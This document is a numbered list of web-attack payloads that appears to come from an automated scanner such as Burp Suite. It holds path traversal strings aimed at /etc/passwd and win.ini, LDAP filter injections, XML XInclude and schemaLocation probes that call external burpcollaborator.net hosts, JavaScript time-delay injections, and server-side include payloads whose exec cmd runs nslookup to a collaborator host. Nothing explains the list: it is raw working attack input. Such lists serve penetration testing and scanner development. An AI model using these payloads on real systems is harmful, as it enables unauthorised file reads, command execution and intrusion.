 321. 464618..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini

 322. 464618../../../../../../../../../../../../../../../../winnt/win.ini

 323. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini464618

 324. c:\windows\win.ini464618

 325. file:///etc/passwd

 326. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini464618

 327. ../../../../../../../../../../../../../../../../etc/passwd

 328. ..././..././..././..././..././..././..././..././..././..././etc/passwd

 329. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

 330. 920871../../../../../../../../../../../../../../../../etc/passwd

 331. ../../../../../../../../../../../../../../../../etc/passwd920871

 332. file:///etc/passwd

 333. ..././..././..././..././..././..././..././..././..././..././etc/passwd

 334. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

 335. 464618../../../../../../../../../../../../../../../../etc/passwd

 336. ../../../../../../../../../../../../../../../../etc/passwd464618

 337. sqst0uoa8o)(objectClass=*

 338. ayi4elexfa)(!(objectClass=*)

 339. *)(objectClass=*

 340. *)(!(objectClass=*)

 341. j069vokz4v)(objectClass=*

 342. <fpd xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://8gpe7qn7yafx53j86wjeamut4kaey7qvqji6cu1.burpcollaborator.net/fpd.xsd">fpd</fpd>

 343. m98evgdg3q)(!(objectClass=*)

 344. *)(objectClass=*

 345. *)(!(objectClass=*)

 346. <zwn xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://cyeipu5bgex1n71co01isqcxmosigb8z9n1avyk.burpcollaborator.net/foo"/></zwn>

 347. <ttd xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://zkn5bhry21jo9unzann5edyk8be52yvmvanxhl6.burpcollaborator.net/ttd.xsd">ttd</ttd>

 348. <ogz xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://5v1bmn24d7uuk0y5ltybpj9qjhpbd46s7gz3tri.burpcollaborator.net/foo"/></ogz>

 349. (function(){if(typeof mofcg==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);mofcg=1;}}())

 350. 785335'+(function(){if(typeof t5ygx==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);t5ygx=1;}}())+'

 351. (function(){if(typeof u047c==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);u047c=1;}}())

 352. 949809'+(function(){if(typeof jooqc==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);jooqc=1;}}())+'

 353. "-->'-->`--><!--#set var="d25" value="c14isu8bje"--><!--#set var="f47" value="e36kuwadlg"--><!--#echo var="d25"--><!--#echo var="f47"--><!--#exec cmd="nslookup -q=cname zor5fhvy61nodurzenr5id2kcbi56yymqkec16pv.burpcollaborator.net" -->

 354. "-->'-->`--><!--#set var="5ql" value="4pkagmw376"--><!--#set var="7sn" value="6rmcioy598"--><!--#echo var="5ql"--><!--#echo var="7sn"--><!--#exec cmd="nslookup -q=cname rc7x39jqutbg1mfr2ffx65qc036xuqnefc34qyen.burpcollaborator.net" -->

 355. <nit xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://o8xuz6fnqq7dxjboycbu22m9w02uqnjbjzbm5au.burpcollaborator.net/nit.xsd">nit</nit>

 356. <vrf xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://9s2fjrz8abryh4v9ixvfmn6uglmfa83w4kw7qvf.burpcollaborator.net/foo"/></vrf>

 357. (function(){if(typeof wqeqz==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);wqeqz=1;}}())

 358. 949809'+(function(){if(typeof egs1j==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);egs1j=1;}}())+'

 359. "-->'-->`--><!--#set var="695" value="584bznf4q7"--><!--#set var="8b7" value="7a6d1ph6s9"--><!--#echo var="695"--><!--#echo var="8b7"--><!--#exec cmd="nslookup -q=cname svryma2rduuhknyslgyyp69dj4pydr6fydm59zxo.burpcollaborator.net" -->